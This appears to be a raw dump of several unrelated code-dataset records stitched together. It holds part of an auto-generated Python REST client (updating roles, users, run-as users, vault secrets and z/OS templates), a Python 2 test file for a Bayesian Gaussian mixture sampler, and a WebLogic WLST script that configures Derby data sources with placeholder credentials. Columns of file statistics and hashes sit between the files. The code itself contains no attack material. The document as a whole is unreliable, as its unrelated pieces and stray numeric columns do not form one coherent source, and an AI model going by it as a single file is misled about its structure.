['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_role(self, role_file, role, **kwargs): # noqa: E501
"""Update Authorization Role # noqa: E501
Update Authorization Role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_role(role_file, role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role_file: (required)
:param str role: The Role name. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_role_with_http_info(role_file, role, **kwargs) # noqa: E501
else:
(data) = self.update_role_with_http_info(role_file, role, **kwargs) # noqa: E501
return data
def update_role_with_http_info(self, role_file, role, **kwargs): # noqa: E501
"""Update Authorization Role # noqa: E501
Update Authorization Role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_role_with_http_info(role_file, role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role_file: (required)
:param str role: The Role name. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['role_file', 'role'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_role" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'role_file' is set
if ('role_file' not in params or
params['role_file'] is None):
raise ValueError("Missing the required parameter `role_file` when calling `update_role`") # noqa: E501
# verify the required parameter 'role' is set
if ('role' not in params or
params['role'] is None):
raise ValueError("Missing the required parameter `role` when calling `update_role`") # noqa: E501
collection_formats = {}
path_params = {}
if 'role' in params:
path_params['role'] = params['role'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'role_file' in params:
local_var_files['roleFile'] = params['role_file'] # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/role/{role}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_run_as_user(self, body, server, agent, user, **kwargs): # noqa: E501
"""Update Run-as user # noqa: E501
Update Run-as user details in server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_run_as_user(body, server, agent, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param RunAsUserDetailsData body: Run as user details data (required)
:param str server: The Server. (required)
:param str agent: The Agent (required)
:param str user: The user name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_run_as_user_with_http_info(body, server, agent, user, **kwargs) # noqa: E501
else:
(data) = self.update_run_as_user_with_http_info(body, server, agent, user, **kwargs) # noqa: E501
return data
def update_run_as_user_with_http_info(self, body, server, agent, user, **kwargs): # noqa: E501
"""Update Run-as user # noqa: E501
Update Run-as user details in server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_run_as_user_with_http_info(body, server, agent, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param RunAsUserDetailsData body: Run as user details data (required)
:param str server: The Server. (required)
:param str agent: The Agent (required)
:param str user: The user name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'agent', 'user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_run_as_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_run_as_user`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `update_run_as_user`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `update_run_as_user`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `update_run_as_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/runasuser/{agent}/{user}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_secret(self, name, **kwargs): # noqa: E501
"""Update an existing secret # noqa: E501
Update an existing secret in the secrets vault. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_secret(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the secret to update (required)
:param SecretValue body: The new value for the secret
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_secret_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.update_secret_with_http_info(name, **kwargs) # noqa: E501
return data
def update_secret_with_http_info(self, name, **kwargs): # noqa: E501
"""Update an existing secret # noqa: E501
Update an existing secret in the secrets vault. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_secret_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the secret to update (required)
:param SecretValue body: The new value for the secret
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_secret" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `update_secret`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/secret/{name}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_user(self, user_file, user, **kwargs): # noqa: E501
"""Update user # noqa: E501
Update user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user(user_file, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_file: (required)
:param str user: The user name. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_user_with_http_info(user_file, user, **kwargs) # noqa: E501
else:
(data) = self.update_user_with_http_info(user_file, user, **kwargs) # noqa: E501
return data
def update_user_with_http_info(self, user_file, user, **kwargs): # noqa: E501
"""Update user # noqa: E501
Update user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_with_http_info(user_file, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_file: (required)
:param str user: The user name. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_file', 'user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_file' is set
if ('user_file' not in params or
params['user_file'] is None):
raise ValueError("Missing the required parameter `user_file` when calling `update_user`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `update_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'user_file' in params:
local_var_files['userFile'] = params['user_file'] # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/user/{user}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_zos_template(self, body, server, agent, template_name, **kwargs): # noqa: E501
"""Update z/OS Template # noqa: E501
Update z/OS Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_zos_template(body, server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ZosTemplateData body: z/OS Template Data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The z/OS Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_zos_template_with_http_info(body, server, agent, template_name, **kwargs) # noqa: E501
else:
(data) = self.update_zos_template_with_http_info(body, server, agent, template_name, **kwargs) # noqa: E501
return data
def update_zos_template_with_http_info(self, body, server, agent, template_name, **kwargs): # noqa: E501
"""Update z/OS Template # noqa: E501
Update z/OS Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_zos_template_with_http_info(body, server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ZosTemplateData body: z/OS Template Data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The z/OS Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'agent', 'template_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_zos_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_zos_template`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `update_zos_template`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `update_zos_template`") # noqa: E501
# verify the required parameter 'template_name' is set
if ('template_name' not in params or
params['template_name'] is None):
raise ValueError("Missing the required parameter `template_name` when calling `update_zos_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'template_name' in params:
path_params['templateName'] = params['template_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.910681
| 356
| 0.607723
| 49,913
| 432,835
| 5.038507
| 0.009396
| 0.052424
| 0.022713
| 0.029202
| 0.984608
| 0.978659
| 0.973856
| 0.968432
| 0.963064
| 0.95768
| 0
| 0.016399
| 0.301221
| 432,835
| 10,579
| 357
| 40.914548
| 0.815084
| 0.328435
| 0
| 0.821939
| 1
| 0
| 0.201124
| 0.054005
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035302
| false
| 0.001205
| 0.000689
| 0
| 0.088858
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7a979a7f64f23764ed5d8eb9868f38a75d08e079
| 4,672
|
py
|
Python
|
pybgmm/tests/test_fbgmm.py
|
junlulocky/BGMM
|
9e3fb310a48733e66770059c8157d55e9d341529
|
[
"MIT"
] | 59
|
2017-05-21T04:04:11.000Z
|
2020-11-25T00:29:17.000Z
|
pybgmm/tests/test_fbgmm.py
|
junlulocky/BGMM
|
9e3fb310a48733e66770059c8157d55e9d341529
|
[
"MIT"
] | null | null | null |
pybgmm/tests/test_fbgmm.py
|
junlulocky/BGMM
|
9e3fb310a48733e66770059c8157d55e9d341529
|
[
"MIT"
] | 21
|
2017-09-13T22:46:04.000Z
|
2019-05-05T20:07:52.000Z
|
"""
Author: Herman Kamper
Contact: kamperh@gmail.com
Date: 2014
"""
import numpy as np
import numpy.testing as npt
import random
from bayes_gmm.niw import NIW
from bayes_gmm.fbgmm import FBGMM
def test_sampling_2d_assignments():
random.seed(1)
np.random.seed(1)
# Data parameters
D = 2 # dimensions
N = 100 # number of points to generate
K_true = 4 # the true number of components
# Model parameters
alpha = 1.
K = 3 # number of components
n_iter = 10
# Generate data
mu_scale = 4.0
covar_scale = 0.7
z_true = np.random.randint(0, K_true, N)
mu = np.random.randn(D, K_true)*mu_scale
X = mu[:, z_true] + np.random.randn(D, N)*covar_scale
X = X.T
# Intialize prior
m_0 = np.zeros(D)
k_0 = covar_scale**2/mu_scale**2
v_0 = D + 3
S_0 = covar_scale**2*v_0*np.eye(D)
prior = NIW(m_0, k_0, v_0, S_0)
# Setup FBGMM
fbgmm = FBGMM(X, prior, alpha, K, "rand")
# Perform Gibbs sampling
record = fbgmm.gibbs_sample(n_iter)
assignments_expected = np.array([
0, 2, 0, 0, 2, 0, 2, 2, 2, 0, 0, 0, 0, 2, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0,
2, 0, 1, 0, 2, 1, 1, 0, 2, 2, 0, 0, 2, 1, 0, 1, 0, 0, 0, 2, 2, 0, 1, 0,
0, 0, 0, 0, 0, 0, 0, 2, 2, 1, 0, 0, 1, 2, 2, 1, 0, 0, 0, 2, 0, 0, 0, 2,
0, 1, 0, 0, 0, 2, 2, 1, 2, 0, 0, 0, 2, 1, 2, 2, 1, 0, 0, 1, 0, 2, 2, 1,
2, 0, 0, 2
])
assignments = fbgmm.components.assignments
npt.assert_array_equal(assignments, assignments_expected)
def test_sampling_2d_log_marg():
random.seed(1)
np.random.seed(1)
# Data parameters
D = 2 # dimensions
N = 100 # number of points to generate
K_true = 4 # the true number of components
# Model parameters
alpha = 1.
K = 3 # number of components
n_iter = 10
# Generate data
mu_scale = 4.0
covar_scale = 0.7
z_true = np.random.randint(0, K_true, N)
mu = np.random.randn(D, K_true)*mu_scale
X = mu[:, z_true] + np.random.randn(D, N)*covar_scale
X = X.T
# Intialize prior
m_0 = np.zeros(D)
k_0 = covar_scale**2/mu_scale**2
v_0 = D + 3
S_0 = covar_scale**2*v_0*np.eye(D)
prior = NIW(m_0, k_0, v_0, S_0)
# Setup FBGMM
fbgmm = FBGMM(X, prior, alpha, K, "rand")
# Perform Gibbs sampling
record = fbgmm.gibbs_sample(n_iter)
expected_log_marg = -415.179929416
log_marg = fbgmm.log_marg()
npt.assert_almost_equal(log_marg, expected_log_marg)
def test_sampling_2d_assignments_deleted_components():
random.seed(1)
np.random.seed(1)
# Data parameters
D = 2 # dimensions
N = 10 # number of points to generate
K_true = 4 # the true number of components
# Model parameters
alpha = 1.
K = 6 # number of components
n_iter = 10
# Generate data
mu_scale = 4.0
covar_scale = 0.7
z_true = np.random.randint(0, K_true, N)
mu = np.random.randn(D, K_true)*mu_scale
X = mu[:, z_true] + np.random.randn(D, N)*covar_scale
X = X.T
# Intialize prior
m_0 = np.zeros(D)
k_0 = covar_scale**2/mu_scale**2
v_0 = D + 3
S_0 = covar_scale**2*v_0*np.eye(D)
prior = NIW(m_0, k_0, v_0, S_0)
# Setup FBGMM
fbgmm = FBGMM(X, prior, alpha, K, "rand")
# Perform Gibbs sampling
record = fbgmm.gibbs_sample(n_iter)
assignments_expected = np.array([2, 0, 1, 1, 0, 2, 0, 2, 0, 1])
assignments = fbgmm.components.assignments
npt.assert_array_equal(assignments, assignments_expected)
def test_sampling_2d_log_marg_deleted_components():
random.seed(1)
np.random.seed(1)
# Data parameters
D = 2 # dimensions
N = 10 # number of points to generate
K_true = 4 # the true number of components
# Model parameters
alpha = 1.
K = 6 # number of components
n_iter = 1
# Generate data
mu_scale = 4.0
covar_scale = 0.7
z_true = np.random.randint(0, K_true, N)
mu = np.random.randn(D, K_true)*mu_scale
X = mu[:, z_true] + np.random.randn(D, N)*covar_scale
X = X.T
# Intialize prior
m_0 = np.zeros(D)
k_0 = covar_scale**2/mu_scale**2
v_0 = D + 3
S_0 = covar_scale**2*v_0*np.eye(D)
prior = NIW(m_0, k_0, v_0, S_0)
# Setup FBGMM
fbgmm = FBGMM(X, prior, alpha, K, "rand")
# Perform Gibbs sampling
record = fbgmm.gibbs_sample(n_iter)
expected_log_marg = -60.1448630929
log_marg = fbgmm.log_marg()
print fbgmm.components.assignments
npt.assert_almost_equal(log_marg, expected_log_marg)
| 24.719577
| 79
| 0.592466
| 792
| 4,672
| 3.315657
| 0.109848
| 0.019802
| 0.014851
| 0.039604
| 0.92003
| 0.871287
| 0.859863
| 0.843869
| 0.843869
| 0.811881
| 0
| 0.076531
| 0.286815
| 4,672
| 188
| 80
| 24.851064
| 0.711585
| 0.161601
| 0
| 0.8125
| 0
| 0
| 0.004201
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0
| null | null | 0
| 0.044643
| null | null | 0.008929
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8ff2b2fb364f175ef657f8328e30e0fa194f4c90
| 6,082
|
py
|
Python
|
jpa/eclipselink.jpars.test/resource/weblogic/wls_derby_setup.py
|
Pandrex247/patched-src-eclipselink
|
10bbc58df62fb4f4f7ac3d8cc531263d374f0d72
|
[
"BSD-3-Clause"
] | null | null | null |
jpa/eclipselink.jpars.test/resource/weblogic/wls_derby_setup.py
|
Pandrex247/patched-src-eclipselink
|
10bbc58df62fb4f4f7ac3d8cc531263d374f0d72
|
[
"BSD-3-Clause"
] | 2
|
2021-03-24T17:58:46.000Z
|
2021-12-14T20:59:52.000Z
|
jpa/eclipselink.jpars.test/resource/weblogic/wls_derby_setup.py
|
Pandrex247/patched-src-eclipselink
|
10bbc58df62fb4f4f7ac3d8cc531263d374f0d72
|
[
"BSD-3-Clause"
] | null | null | null |
############################################################################
# Generic script applicable on any Operating Environments (Unix, Windows)
# ScriptName : wls_derby_setup.py - only for Derby DB when using Network Server
# not for Enbedded Server
# Properties : weblogic.properties test.properties
# Author : Kevin Yuan
############################################################################
#===========================================================================
# Connect to wls server
#===========================================================================
connect('@WL_USR@','@WL_PWD@','t3://@WL_HOST@:@WL_PORT@')
#===========================================================================
# Create and configure JTA Data Source and target it to the server.
#===========================================================================
edit()
startEdit()
cd('/')
cmo.createJDBCSystemResource('EclipseLinkDS')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS')
cmo.setName('EclipseLinkDS')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDataSourceParams/EclipseLinkDS')
set('JNDINames',jarray.array([String('jdbc/EclipseLinkDS')], String))
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS')
cmo.setUrl('jdbc:derby://localhost:1527/ECLIPSELINK;create=true;ServerName=localhost;databaseName=ECLIPSELINK')
cmo.setDriverName('org.apache.derby.jdbc.ClientXADataSource')
set('PasswordEncrypted','@DBPWD@')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCConnectionPoolParams/EclipseLinkDS')
cmo.setTestTableName('SQL SELECT 1 FROM SYS.SYSTABLES\r\n\r\n')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS')
cmo.createProperty('user')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS/Properties/user')
cmo.setValue('@DBUSR@')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS')
cmo.createProperty('portNumber')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS/Properties/portNumber')
cmo.setValue('1527')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS')
cmo.createProperty('databaseName')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS/Properties/databaseName')
cmo.setValue('ECLIPSELINK;create=true')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS')
cmo.createProperty('serverName')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDriverParams/EclipseLinkDS/Properties/EclipseLinkDS/Properties/serverName')
cmo.setValue('localhost')
cd('/JDBCSystemResources/EclipseLinkDS/JDBCResource/EclipseLinkDS/JDBCDataSourceParams/EclipseLinkDS')
cmo.setGlobalTransactionsProtocol('TwoPhaseCommit')
cd('/SystemResources/EclipseLinkDS')
set('Targets',jarray.array([ObjectName('com.bea:Name=@TARGET_SERVER@,Type=Server')], ObjectName))
save()
activate()
#===========================================================================
# Create and configure Non-JTA Data Source and target it to the server.
#===========================================================================
edit()
startEdit()
cd('/')
cmo.createJDBCSystemResource('ELNonJTADS')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS')
cmo.setName('ELNonJTADS')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDataSourceParams/ELNonJTADS')
set('JNDINames',jarray.array([String('jdbc/ELNonJTADS')], String))
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS')
cmo.setUrl('jdbc:derby://localhost:1527/ECLIPSELINK;create=true;ServerName=localhost;databaseName=ECLIPSELINK')
cmo.setDriverName('org.apache.derby.jdbc.ClientDataSource')
set('PasswordEncrypted','@DBPWD@')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCConnectionPoolParams/ELNonJTADS')
cmo.setTestTableName('SQL SELECT 1 FROM SYS.SYSTABLES\r\n\r\n')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS')
cmo.createProperty('user')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS/Properties/user')
cmo.setValue('@DBUSR@')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS')
cmo.createProperty('portNumber')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS/Properties/portNumber')
cmo.setValue('1527')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS')
cmo.createProperty('databaseName')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS/Properties/databaseName')
cmo.setValue('ECLIPSELINK;create=true')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS')
cmo.createProperty('serverName')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS/Properties/serverName')
cmo.setValue('localhost')
cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDataSourceParams/ELNonJTADS')
cmo.setGlobalTransactionsProtocol('None')
cd('/SystemResources/ELNonJTADS')
set('Targets',jarray.array([ObjectName('com.bea:Name=@TARGET_SERVER@,Type=Server')], ObjectName))
save()
activate()
#===========================================================================
# Exit WLST.
#===========================================================================
exit()
| 45.729323
| 147
| 0.722131
| 500
| 6,082
| 8.768
| 0.216
| 0.124544
| 0.100821
| 0.136405
| 0.863823
| 0.810447
| 0.759352
| 0.607208
| 0.607208
| 0.587135
| 0
| 0.003262
| 0.042256
| 6,082
| 132
| 148
| 46.075758
| 0.749356
| 0.174449
| 0
| 0.621622
| 0
| 0.027027
| 0.753659
| 0.682952
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0.027027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89165d789bd755afb216e90cf479a889adf2f3a9
| 7,565
|
py
|
Python
|
Calculate_power_absorbed_ellipse.py
|
mkraft89/To_eels_app
|
9e2fc6d501f51130b12164997f40cb7e0ec5a654
|
[
"Unlicense"
] | null | null | null |
Calculate_power_absorbed_ellipse.py
|
mkraft89/To_eels_app
|
9e2fc6d501f51130b12164997f40cb7e0ec5a654
|
[
"Unlicense"
] | null | null | null |
Calculate_power_absorbed_ellipse.py
|
mkraft89/To_eels_app
|
